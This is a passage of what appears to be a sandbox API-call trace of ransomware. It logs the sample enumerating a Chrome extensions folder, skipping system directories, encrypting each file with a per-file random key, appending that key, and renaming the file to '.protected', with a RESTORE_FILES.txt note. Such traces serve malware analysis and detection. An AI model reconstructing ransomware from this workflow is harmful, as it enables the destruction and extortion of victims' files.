(lpString1=".", lpString2="Program Files") returned -1 [0079.161] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.161] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.161] 
lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.161] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\.") returned 125 [0079.161] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.161] FindNextFileW (in: hFindFile=0x47bb50, lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 1 [0079.161] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.161] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.161] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.161] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.161] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.161] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\..") returned 126 [0079.161] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.161] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.161] FindNextFileW (in: hFindFile=0x47bb50, lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 1 [0079.161] lstrcmpiW (lpString1="14.1_0", lpString2="Windows") returned -1 [0079.161] lstrcmpiW (lpString1="14.1_0", lpString2="Program Files") returned -1 [0079.161] lstrcmpiW (lpString1="14.1_0", lpString2="Program Files (x86)") returned -1 [0079.161] lstrcmpiW (lpString1="14.1_0", lpString2="$Recycle.bin") returned 1 [0079.161] lstrcmpiW (lpString1="14.1_0", lpString2="System Volume Information") returned -1 [0079.161] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0") returned 130 [0079.161] lstrcmpW (lpString1="14.1_0", lpString2=".") returned 1 [0079.161] lstrcmpW (lpString1="14.1_0", lpString2="..") returned 1 [0079.162] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\*") returned 132 [0079.162] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\*", lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 0x47bb90 [0079.176] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.176] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.177] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.177] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.177] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.177] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\.") returned 132 [0079.177] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.177] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 [0079.177] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.177] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.177] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.177] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.177] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.177] wnsprintfW (in: 
pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\..") returned 133 [0079.177] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.177] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.177] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 [0079.177] lstrcmpiW (lpString1="128.png", lpString2="Windows") returned -1 [0079.177] lstrcmpiW (lpString1="128.png", lpString2="Program Files") returned -1 [0079.177] lstrcmpiW (lpString1="128.png", lpString2="Program Files (x86)") returned -1 [0079.177] lstrcmpiW (lpString1="128.png", lpString2="$Recycle.bin") returned 1 [0079.177] lstrcmpiW (lpString1="128.png", lpString2="System Volume Information") returned -1 [0079.177] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\128.png") returned 138 [0079.177] StrStrIW (lpFirst="128.png", lpSrch=".protected") returned 0x0 [0079.177] lstrcmpW (lpString1="128.png", lpString2="RESTORE_FILES.txt") returned -1 [0079.177] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ddac | out: pbBuffer=0x295ddac) returned 1 [0079.177] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x30) returned 1 [0079.177] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\128.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\128.png"), 
dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0079.179] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\128.png") returned 138 [0079.179] StrStrW (lpFirst="128.png", lpSrch=".txt") returned 0x0 [0079.179] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\128.png") returned 138 [0079.179] StrStrW (lpFirst="128.png", lpSrch=".rar") returned 0x0 [0079.179] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\128.png") returned 138 [0079.179] StrStrW (lpFirst="128.png", lpSrch=".zip") returned 0x0 [0079.179] ReadFile (in: hFile=0x160, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295ddf4*=0x1a33, lpOverlapped=0x0) returned 1 [0079.183] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0xffffe5cd, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.183] WriteFile (in: hFile=0x160, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x1a33, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295ddf4*=0x1a33, lpOverlapped=0x0) returned 1 [0079.184] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.184] WriteFile (in: hFile=0x160, lpBuffer=0x295ddcc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x295ddcc*, lpNumberOfBytesWritten=0x295ddf4*=0x4, lpOverlapped=0x0) returned 1 [0079.184] WriteFile 
(in: hFile=0x160, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ddf4*=0x30, lpOverlapped=0x0) returned 1 [0079.184] CloseHandle (hObject=0x160) returned 1 [0079.185] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\128.png.protected") returned 148 [0079.185] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\128.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\128.png"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\128.png.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\128.png.protected")) returned 1 [0079.185] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 [0079.185] lstrcmpiW (lpString1="manifest.json", lpString2="Windows") returned -1 [0079.185] lstrcmpiW (lpString1="manifest.json", lpString2="Program Files") returned -1 [0079.185] lstrcmpiW (lpString1="manifest.json", lpString2="Program Files (x86)") returned -1 [0079.186] lstrcmpiW (lpString1="manifest.json", lpString2="$Recycle.bin") returned 1 [0079.186] lstrcmpiW (lpString1="manifest.json", lpString2="System Volume Information") returned -1 [0079.186] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\manifest.json") returned 144 [0079.186] StrStrIW (lpFirst="manifest.json", lpSrch=".protected") returned 0x0 [0079.186] lstrcmpW (lpString1="manifest.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.186] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ddac | out: pbBuffer=0x295ddac) returned 1 [0079.186] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x30) returned 1 [0079.186] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\manifest.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\manifest.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0079.186] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\manifest.json") returned 144 [0079.186] StrStrW (lpFirst="manifest.json", lpSrch=".txt") returned 0x0 [0079.186] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\manifest.json") returned 144 [0079.186] StrStrW (lpFirst="manifest.json", lpSrch=".rar") returned 0x0 [0079.186] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\manifest.json") returned 144 [0079.186] StrStrW (lpFirst="manifest.json", lpSrch=".zip") returned 0x0 [0079.186] ReadFile (in: hFile=0x160, 
lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295ddf4*=0x3ec, lpOverlapped=0x0) returned 1 [0079.196] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0xfffffc14, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.196] WriteFile (in: hFile=0x160, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x3ec, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295ddf4*=0x3ec, lpOverlapped=0x0) returned 1 [0079.196] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.196] WriteFile (in: hFile=0x160, lpBuffer=0x295ddcc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x295ddcc*, lpNumberOfBytesWritten=0x295ddf4*=0x4, lpOverlapped=0x0) returned 1 [0079.197] WriteFile (in: hFile=0x160, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ddf4*=0x30, lpOverlapped=0x0) returned 1 [0079.197] CloseHandle (hObject=0x160) returned 1 [0079.197] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\manifest.json.protected") returned 154 [0079.197] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\manifest.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\manifest.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\manifest.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\manifest.json.protected")) returned 1 [0079.197] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 [0079.197] lstrcmpiW (lpString1="_locales", lpString2="Windows") returned -1 [0079.197] lstrcmpiW (lpString1="_locales", lpString2="Program Files") returned -1 [0079.197] lstrcmpiW (lpString1="_locales", lpString2="Program Files (x86)") returned -1 [0079.197] lstrcmpiW (lpString1="_locales", lpString2="$Recycle.bin") returned 1 [0079.197] lstrcmpiW (lpString1="_locales", lpString2="System Volume Information") returned -1 [0079.197] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales") returned 139 [0079.197] lstrcmpW (lpString1="_locales", lpString2=".") returned 1 [0079.197] lstrcmpW (lpString1="_locales", lpString2="..") returned 1 [0079.198] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\*") returned 141 [0079.198] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\*", lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 0x47bbd0 [0079.204] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.204] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.204] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned 
-1 [0079.204] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.204] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.204] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\.") returned 141 [0079.204] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.204] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.204] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.204] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.204] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.204] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.204] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.204] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\..") returned 142 [0079.204] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.204] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.204] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.204] lstrcmpiW (lpString1="ar", lpString2="Windows") returned -1 [0079.204] lstrcmpiW (lpString1="ar", lpString2="Program Files") returned -1 [0079.204] lstrcmpiW (lpString1="ar", lpString2="Program Files (x86)") returned -1 [0079.204] lstrcmpiW (lpString1="ar", lpString2="$Recycle.bin") returned 1 [0079.204] lstrcmpiW (lpString1="ar", lpString2="System Volume Information") returned -1 [0079.204] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: 
pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ar") returned 142 [0079.204] lstrcmpW (lpString1="ar", lpString2=".") returned 1 [0079.204] lstrcmpW (lpString1="ar", lpString2="..") returned 1 [0079.204] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ar\\*") returned 144 [0079.204] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ar\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0079.205] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.205] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.205] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.205] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.205] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.205] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ar\\.") returned 144 [0079.205] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.205] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.205] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.205] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.205] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.205] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") 
returned 1 [0079.205] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.205] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ar\\..") returned 145 [0079.205] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.205] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.205] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.205] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0079.205] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0079.205] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0079.205] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0079.205] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0079.205] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ar\\messages.json") returned 156 [0079.205] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0079.205] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.205] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0079.205] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0079.205] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ar\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ar\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0079.206] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ar\\messages.json") returned 156 [0079.206] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0079.206] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ar\\messages.json") returned 156 [0079.206] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0079.206] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ar\\messages.json") returned 156 [0079.207] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0079.207] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x116, lpOverlapped=0x0) returned 1 [0079.207] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffeea, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.208] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x116, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x116, lpOverlapped=0x0) returned 1 [0079.208] SetFilePointerEx (in: hFile=0x168, 
liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.208] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0079.208] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0079.208] CloseHandle (hObject=0x168) returned 1 [0079.208] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ar\\messages.json.protected") returned 166 [0079.208] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ar\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ar\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ar\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user 